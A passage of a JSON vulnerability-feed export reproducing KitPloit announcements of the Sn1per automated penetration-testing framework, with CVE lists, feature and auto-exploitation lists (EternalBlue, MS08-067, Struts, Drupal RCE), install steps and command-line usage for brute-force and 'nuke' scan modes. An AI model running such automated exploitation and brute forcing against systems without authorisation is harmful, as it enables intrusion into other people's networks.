"3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-04T21:12:00", "type": "kitploit", "title": "Darksplitz - Exploit Framework", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10933", "CVE-2018-14847", "CVE-2018-4407", "CVE-2018-7600", "CVE-2018-9206"], "modified": "2019-04-04T21:12:09", "id": "KITPLOIT:5494076556436489947", "href": "http://www.kitploit.com/2019/04/darksplitz-exploit-framework.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-07T12:04:21", "description": "[](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n**DEMO VIDEO:** \n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Apache Jakarta RCE CVE-2017-5638\n * Shellshock GNU Bash RCE CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin File Disclosure CVE-2006-3392\n * [Anonymous FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCE's\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-11-24T12:43:00", "type": "kitploit", "title": "Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-11-24T12:43:00", "id": "KITPLOIT:8672599587089685905", "href": "http://www.kitploit.com/2018/11/sn1per-v60-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T12:04:42", "description": "[](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n**DEMO VIDEO:** \n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Apache Jakarta RCE CVE-2017-5638\n * Shellshock GNU Bash RCE CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin File Disclosure CVE-2006-3392\n * [Anonymous FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCE's\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-07-05T13:45:00", "type": "kitploit", "title": "Sn1per v5.0 - Automated Pentest Recon Scanner", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-07-05T13:45:01", "id": "KITPLOIT:7835941952769002973", "href": "http://www.kitploit.com/2018/07/sn1per-v50-automated-pentest-recon.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T12:03:55", "description": "[](<https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner> \"automated scanner\" ) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test> \"penetration test\" ) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ).\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s1600/Sn1per_10.png>)\n\n \n**Detailed host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s1600/Sn1per_11.png>)\n\n \n**NMap HTML host reports** \n \n\n\n[](<https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s1600/Sn1per_13.png>)\n\n \n**Takeovers and Email Security** \n \n\n\n[](<https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s1600/Sn1per_14.png>)\n\n \n**HTML5 Notepad** \n \n\n\n[](<https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s1600/Sn1per_15.png>)\n\n \n**ORDER SN1PER PROFESSIONAL:** \nTo obtain a Sn1per Professional license, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ). \n \n**DEMO VIDEO:** \n \n \n\n\n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>)\n\n \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**EXPLOITS:** \n\n\n * Drupal RESTful Web Services unserialize() SA-CORE-2019-003\n * Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts\n * Drupal: CVE-2018-7600: [Remote Code Execution](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) \\- SA-CORE-2018-002\n * GPON Routers - Authentication Bypass / [Command Injection](<https://www.kitploit.com/search/label/Command%20Injection> \"Command Injection\" ) CVE-2018-10561\n * MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption\n * Apache Tomcat: Remote Code Execution (CVE-2017-12617)\n * Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805)\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269\n * ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249\n * Shellshock Bash Shell remote code execution CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387)\n * Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843\n * MS08-067 Microsoft Server Service Relative Path Stack Corruption\n * Webmin File Disclosure CVE-2006-3392\n * VsFTPd 2.3.4 Backdoor\n * ProFTPd 1.3.3C Backdoor\n * MS03-026 Microsoft RPC DCOM Interface Overflow\n * DistCC Daemon Command Execution\n * JBoss Java De-Serialization\n * HTTP Writable Path PUT/DELETE File Access\n * Apache Tomcat User Enumeration\n * Tomcat Application Manager Login Bruteforce\n * Jenkins-CI Enumeration\n * HTTP WebDAV Scanner\n * Android Insecure ADB\n * Anonymous FTP Access\n * PHPMyAdmin Backdoor\n * PHPMyAdmin Auth Bypass\n * OpenSSH User Enumeration\n * LibSSH Auth Bypass\n * SMTP User Enumeration\n * Public NFS Mounts\n \n**KALI LINUX INSTALL:** \n\n \n \n bash install.sh\n\n \n**UBUNTU/DEBIAN/PARROT INSTALL:** \n\n \n \n bash install_debian_ubuntu.sh\n\n \n**DOCKER INSTALL:** \n\n \n \n docker build Dockerfile\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE\n sniper -t|--target <TARGET> -o|--osint -re|--recon -fp|--fullportonly -b|--bruteforce\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] FLYOVER MODE\n sniper -t|--target <TARGET> -m|--mode flyover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TA RGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT HTTP MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT HTTPS MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] WEBSCAN MODE\n sniper -t|--target <TARGET> -m|--mode webscan\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] LOOT REIMPORTALL FUNCTION\n sniper -w <WORKSPACE_ALIAS& gt; --reimportall\n \n [*] DELETE WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -d\n \n [*] DELETE HOST FROM WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh\n \n [*] SCHEDULED SCANS'\n sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly'\n \n [*] SCAN STATUS\n sniper --status\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **FLYOVER:** 